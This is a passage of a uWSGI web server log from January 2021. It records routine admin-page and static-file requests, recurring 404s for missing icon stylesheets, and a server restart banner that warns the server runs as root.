0|req: 1289/1689] 219.228.146.132 () {40 vars in 889 bytes} [Wed Jan 13 08:36:34 2021] GET /admin-home/ => generated 9601 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 12823|app: 0|req: 1290/1690] 219.228.146.132 () {38 vars in 802 bytes} [Wed Jan 13 08:36:34 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 12823|app: 0|req: 1291/1691] 219.228.146.132 () {38 vars in 834 bytes} [Wed Jan 13 08:36:34 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 12823|app: 0|req: 1292/1692] 219.228.146.132 () {38 vars in 846 bytes} [Wed Jan 13 08:36:34 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 12823|app: 0|req: 1293/1693] 219.228.146.132 () {38 vars in 838 bytes} [Wed Jan 13 08:36:34 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 12823|app: 0|req: 1294/1694] 219.228.146.132 () {38 vars in 822 bytes} [Wed Jan 13 08:36:34 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 12823|app: 0|req: 1295/1695] 219.228.146.132 () {38 vars in 822 bytes} [Wed Jan 13 08:36:34 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 12823|app: 0|req: 1296/1696] 219.228.146.132 () {38 vars in 878 bytes} [Wed Jan 13 08:36:34 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 12823|app: 0|req: 1297/1697] 219.228.146.132 () {38 vars in 770 bytes} [Wed Jan 13 08:36:34 2021] GET /static/css/spinners.css => generated 3433 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 12823|app: 0|req: 1298/1698] 219.228.146.132 () {38 vars in 768 bytes} [Wed Jan 13 08:36:34 2021] GET /static/css/animate.css => generated 3430 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +zhiding +置顶 +[pid: 12823|app: 0|req: 1299/1699] 219.228.146.132 () {48 vars in 970 bytes} [Wed Jan 13 08:36:36 2021] POST /admin-home/ => generated 27 bytes in 5 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 1300/1700] 219.228.146.132 () {40 vars in 889 bytes} [Wed Jan 13 08:36:36 2021] GET /admin-home/ => generated 9601 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 12823|app: 0|req: 1301/1701] 219.228.146.132 () {38 vars in 834 bytes} [Wed Jan 13 08:36:37 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 12823|app: 0|req: 1302/1702] 219.228.146.132 () {38 vars in 768 bytes} [Wed Jan 13 08:36:37 2021] GET /static/css/animate.css => generated 3430 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 12823|app: 0|req: 1303/1703] 219.228.146.132 () {38 vars in 838 bytes} [Wed Jan 13 08:36:37 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 12823|app: 0|req: 1304/1704] 219.228.146.132 () {38 vars in 846 bytes} [Wed Jan 13 08:36:37 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 12823|app: 0|req: 1305/1705] 219.228.146.132 () {38 vars in 802 bytes} [Wed Jan 13 08:36:37 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 12823|app: 0|req: 1306/1706] 219.228.146.132 () {38 vars in 822 bytes} [Wed Jan 13 08:36:37 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 12823|app: 0|req: 1307/1707] 219.228.146.132 () {38 vars in 822 bytes} [Wed Jan 13 08:36:37 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 12823|app: 0|req: 1308/1708] 219.228.146.132 () {38 vars in 878 bytes} [Wed Jan 13 08:36:37 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 12823|app: 0|req: 1309/1709] 219.228.146.132 () {38 vars in 770 bytes} [Wed Jan 13 08:36:37 2021] GET /static/css/spinners.css => generated 3433 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 1310/1710] 219.228.146.132 () {42 vars in 920 bytes} [Wed Jan 13 08:38:17 2021] GET /admin-home/ => generated 9601 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 12823|app: 0|req: 1311/1711] 219.228.146.132 () {38 vars in 834 bytes} [Wed Jan 13 08:38:17 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 12823|app: 0|req: 1312/1712] 219.228.146.132 () {38 vars in 846 bytes} [Wed Jan 13 08:38:17 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 12823|app: 0|req: 1313/1713] 219.228.146.132 () {38 vars in 838 bytes} [Wed Jan 13 08:38:17 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 12823|app: 0|req: 1314/1714] 219.228.146.132 () {38 vars in 802 bytes} [Wed Jan 13 08:38:17 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 12823|app: 0|req: 1315/1715] 219.228.146.132 () {38 vars in 878 bytes} [Wed Jan 13 08:38:17 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 12823|app: 0|req: 1316/1716] 219.228.146.132 () {38 vars in 822 bytes} [Wed Jan 13 08:38:17 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 12823|app: 0|req: 1317/1717] 219.228.146.132 () {38 vars in 822 bytes} [Wed Jan 13 08:38:17 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 12823|app: 0|req: 1318/1718] 219.228.146.132 () {38 vars in 770 bytes} [Wed Jan 13 08:38:17 2021] GET /static/css/spinners.css => generated 3433 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 12823|app: 0|req: 1319/1719] 219.228.146.132 () {38 vars in 768 bytes} [Wed Jan 13 08:38:17 2021] GET /static/css/animate.css => generated 3430 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 1320/1720] 219.228.146.132 () {42 vars in 920 bytes} [Wed Jan 13 08:38:22 2021] GET /admin-home/ => generated 9601 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 12823|app: 0|req: 1321/1721] 219.228.146.132 () {38 vars in 834 bytes} [Wed Jan 13 08:38:22 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 12823|app: 0|req: 1322/1722] 219.228.146.132 () {38 vars in 846 bytes} [Wed Jan 13 08:38:23 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 12823|app: 0|req: 1323/1723] 219.228.146.132 () {38 vars in 800 bytes} [Wed Jan 13 08:38:23 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 12823|app: 0|req: 1324/1724] 219.228.146.132 () {38 vars in 768 bytes} [Wed Jan 13 08:38:23 2021] GET /static/css/spinners.css => generated 3433 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 12823|app: 0|req: 1325/1725] 219.228.146.132 () {38 vars in 838 bytes} [Wed Jan 13 08:38:23 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 12823|app: 0|req: 1326/1726] 219.228.146.132 () {38 vars in 820 bytes} [Wed Jan 13 08:38:23 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 12823|app: 0|req: 1327/1727] 219.228.146.132 () {38 vars in 821 bytes} [Wed Jan 13 08:38:23 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 12823|app: 0|req: 1328/1728] 219.228.146.132 () {38 vars in 877 bytes} [Wed Jan 13 08:38:23 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 12823|app: 0|req: 1329/1729] 219.228.146.132 () {38 vars in 767 bytes} [Wed Jan 13 08:38:23 2021] GET /static/css/animate.css => generated 3430 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 1330/1730] 219.228.146.132 () {40 vars in 892 bytes} [Wed Jan 13 08:38:25 2021] GET /announcement/ => generated 13398 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 12823|app: 0|req: 1331/1731] 219.228.146.132 () {38 vars in 833 bytes} [Wed Jan 13 08:38:25 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 12823|app: 0|req: 1332/1732] 219.228.146.132 () {38 vars in 845 bytes} [Wed Jan 13 08:38:25 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 12823|app: 0|req: 1333/1733] 219.228.146.132 () {38 vars in 821 bytes} [Wed Jan 13 08:38:25 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 12823|app: 0|req: 1334/1734] 219.228.146.132 () {38 vars in 837 bytes} [Wed Jan 13 08:38:25 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 12823|app: 0|req: 1335/1735] 219.228.146.132 () {38 vars in 767 bytes} [Wed Jan 13 08:38:25 2021] GET /static/css/animate.css => generated 3430 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 12823|app: 0|req: 1336/1736] 219.228.146.132 () {38 vars in 801 bytes} [Wed Jan 13 08:38:25 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 12823|app: 0|req: 1337/1737] 219.228.146.132 () {38 vars in 821 bytes} [Wed Jan 13 08:38:25 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 12823|app: 0|req: 1338/1738] 219.228.146.132 () {38 vars in 877 bytes} [Wed Jan 13 08:38:25 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 12823|app: 0|req: 1339/1739] 219.228.146.132 () {38 vars in 770 bytes} [Wed Jan 13 08:38:25 2021] GET /static/css/spinners.css => generated 3433 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 1340/1740] 219.228.146.132 () {40 vars in 893 bytes} [Wed Jan 13 08:38:28 2021] GET /kind-manage/ => generated 12023 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 12823|app: 0|req: 1341/1741] 219.228.146.132 () {38 vars in 834 bytes} [Wed Jan 13 08:38:28 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 12823|app: 0|req: 1342/1742] 219.228.146.132 () {38 vars in 846 bytes} [Wed Jan 13 08:38:28 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 12823|app: 0|req: 1343/1743] 219.228.146.132 () {38 vars in 838 bytes} [Wed Jan 13 08:38:28 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 12823|app: 0|req: 1344/1744] 219.228.146.132 () {38 vars in 822 bytes} [Wed Jan 13 08:38:28 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 12823|app: 0|req: 1345/1745] 219.228.146.132 () {38 vars in 802 bytes} [Wed Jan 13 08:38:28 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 12823|app: 0|req: 1346/1746] 219.228.146.132 () {38 vars in 822 bytes} [Wed Jan 13 08:38:28 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 12823|app: 0|req: 1347/1747] 219.228.146.132 () {38 vars in 878 bytes} [Wed Jan 13 08:38:28 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 12823|app: 0|req: 1348/1748] 219.228.146.132 () {38 vars in 770 bytes} [Wed Jan 13 08:38:28 2021] GET /static/css/spinners.css => generated 3433 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 12823|app: 0|req: 1349/1749] 219.228.146.132 () {38 vars in 768 bytes} [Wed Jan 13 08:38:28 2021] GET /static/css/animate.css => generated 3430 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 1350/1750] 219.228.146.132 () {42 vars in 924 bytes} [Wed Jan 13 08:48:23 2021] GET /kind-manage/ => generated 12023 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 12823|app: 0|req: 1351/1751] 219.228.146.132 () {38 vars in 834 bytes} [Wed Jan 13 08:48:23 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 12823|app: 0|req: 1352/1752] 219.228.146.132 () {38 vars in 846 bytes} [Wed Jan 13 08:48:23 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 12823|app: 0|req: 1353/1753] 219.228.146.132 () {38 vars in 802 bytes} [Wed Jan 13 08:48:23 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 12823|app: 0|req: 1354/1754] 219.228.146.132 () {38 vars in 838 bytes} [Wed Jan 13 08:48:23 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 12823|app: 0|req: 1355/1755] 219.228.146.132 () {38 vars in 822 bytes} [Wed Jan 13 08:48:23 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 12823|app: 0|req: 1356/1756] 219.228.146.132 () {38 vars in 768 bytes} [Wed Jan 13 08:48:23 2021] GET /static/css/animate.css => generated 3430 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 12823|app: 0|req: 1357/1757] 219.228.146.132 () {38 vars in 822 bytes} [Wed Jan 13 08:48:23 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 12823|app: 0|req: 1358/1758] 219.228.146.132 () {38 vars in 878 bytes} [Wed Jan 13 08:48:23 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 12823|app: 0|req: 1359/1759] 219.228.146.132 () {38 vars in 770 bytes} [Wed Jan 13 08:48:23 2021] GET /static/css/spinners.css => generated 3433 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 1360/1760] 219.228.146.132 () {42 vars in 906 bytes} [Wed Jan 13 08:48:27 2021] GET /home/ => generated 10096 bytes in 8 msecs (HTTP/1.1 200) 6 headers in 182 bytes (1 switches on core 1) +[pid: 12823|app: -1|req: -1/1761] 219.228.146.132 () {40 vars in 850 bytes} [Wed Jan 13 08:48:27 2021] GET /static/img/t_photo/8_th.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 12823|app: -1|req: -1/1762] 219.228.146.132 () {40 vars in 860 bytes} [Wed Jan 13 08:48:27 2021] GET /static/img/t_photo/9_th%20(1).jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 12823|app: -1|req: -1/1763] 219.228.146.132 () {42 vars in 838 bytes} [Wed Jan 13 08:48:27 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +0 +0 +[, ] +[pid: 12823|app: 0|req: 1361/1764] 219.228.146.132 () {40 vars in 879 bytes} [Wed Jan 13 08:48:31 2021] GET /all-1-0-0 => generated 9501 bytes in 10 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 1362/1765] 219.228.146.132 () {40 vars in 883 bytes} [Wed Jan 13 08:48:35 2021] GET /all-0-0-0 => generated 9501 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +0 +0 +[, ] +[pid: 12823|app: 0|req: 1363/1766] 219.228.146.132 () {40 vars in 883 bytes} [Wed Jan 13 08:48:39 2021] GET /all-1-0-0 => generated 9501 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[] +[pid: 12823|app: 0|req: 1364/1767] 219.228.146.132 () {40 vars in 882 bytes} [Wed Jan 13 08:48:41 2021] GET /all-3-0-0 => generated 8761 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 1365/1768] 219.228.146.132 () {40 vars in 882 bytes} [Wed Jan 13 08:48:47 2021] GET /all-0-0-0 => generated 9501 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +*** Starting uWSGI 2.0.19.1 (64bit) on [Thu Jan 14 15:17:45 2021] *** +compiled with version: 4.8.5 20150623 (Red Hat 4.8.5-44) on 14 January 2021 03:06:44 +os: Linux-3.10.0-1127.19.1.el7.x86_64 #1 SMP Tue Aug 25 17:23:54 UTC 2020 +nodename: VM-0-8-centos +machine: x86_64 +clock source: unix +pcre jit disabled +detected number of CPU cores: 1 +current working directory: /www/wwwroot/master +detected binary path: /www/wwwroot/master/pyweb/bin/uwsgi +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** +chdir() to /www/wwwroot/master +your processes number limit is 3874 +your memory page size is 4096 bytes +detected max file descriptor number: 100001 +!!! no /etc/mime.types file found !!! +lock engine: pthread robust mutexes +thunder lock: disabled (you can enable it with --thunder-lock) +uWSGI http bound on 0.0.0.0:8000 fd 4 +uwsgi socket 0 bound to TCP address 127.0.0.1:35412 (port auto-assigned) fd 3 +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** +Python version: 3.6.6 (default, Jan 14 2021, 10:51:21) [GCC 4.8.5 20150623 (Red Hat 4.8.5-44)] +Python main interpreter initialized at 0x18fd010 +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** +python threads support enabled +your server socket listen backlog is limited to 100 connections +your mercy for graceful operations on workers is 60 seconds +mapped 166752 bytes (162 KB) for 2 cores +*** Operational MODE: threaded *** +WSGI app 0 (mountpoint='') ready in 1 seconds on interpreter 0x18fd010 pid: 32183 (default app) +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** +*** uWSGI is running in multiple interpreter mode *** +spawned uWSGI master process (pid: 32183) +spawned uWSGI worker 1 (pid: 32185, cores: 2) +spawned uWSGI http 1 (pid: 32186) +Not Found: / +[pid: 32185|app: 0|req: 1/1] 219.228.146.156 () {38 vars in 853 bytes} [Thu Jan 14 07:18:26 2021] GET / => generated 3429 bytes in 47 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /favicon.ico +[pid: 32185|app: 0|req: 2/2] 219.228.146.156 () {38 vars in 799 bytes} [Thu Jan 14 07:18:27 2021] GET /favicon.ico => generated 3480 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 32185|app: 0|req: 3/3] 219.228.146.156 () {38 vars in 863 bytes} [Thu Jan 14 07:18:32 2021] GET /login => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 175 bytes (1 switches on core 1) +[pid: 32185|app: 0|req: 4/4] 219.228.146.156 () {38 vars in 865 bytes} [Thu Jan 14 07:18:32 2021] GET /login/ => generated 6428 bytes in 11 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 32185|app: -1|req: -1/5] 219.228.146.156 () {38 vars in 810 bytes} [Thu Jan 14 07:18:32 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 4 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 0) +[pid: 32185|app: -1|req: -1/6] 219.228.146.156 () {38 vars in 832 bytes} [Thu Jan 14 07:18:32 2021] GET /static/css/bootstrap-responsive.css => generated 20999 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 32185|app: -1|req: -1/7] 219.228.146.156 () {38 vars in 814 bytes} [Thu Jan 14 07:18:32 2021] GET /static/css/prettyPhoto.css => generated 26845 bytes in 3 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 32185|app: -1|req: -1/8] 219.228.146.156 () {38 vars in 812 bytes} [Thu Jan 14 07:18:32 2021] GET /static/css/flexslider.css => generated 3552 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 32185|app: -1|req: -1/9] 219.228.146.156 () {38 vars in 793 bytes} [Thu Jan 14 07:18:32 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 2 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 32185|app: -1|req: -1/10] 219.228.146.156 () {38 vars in 818 bytes} [Thu Jan 14 07:18:32 2021] GET /static/css/custom-styles.css => generated 